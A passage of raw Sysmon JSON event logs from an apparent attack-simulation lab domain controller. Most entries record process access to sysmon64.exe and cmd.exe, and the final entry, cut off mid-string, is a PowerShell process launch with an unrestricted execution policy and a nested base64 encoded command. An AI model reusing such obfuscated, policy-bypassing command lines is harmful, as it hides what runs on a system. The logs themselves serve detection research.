05:52:42.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5059,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5060,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5061,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5062,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5063,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5064,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5065,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.328\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-0010B5C10900}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.328","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-0010B5C10900}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5066,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.343\r\nProcessGuid: {A837DB8D-032A-5F25-0000-001080C20900}\r\nProcessId: 4456\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEA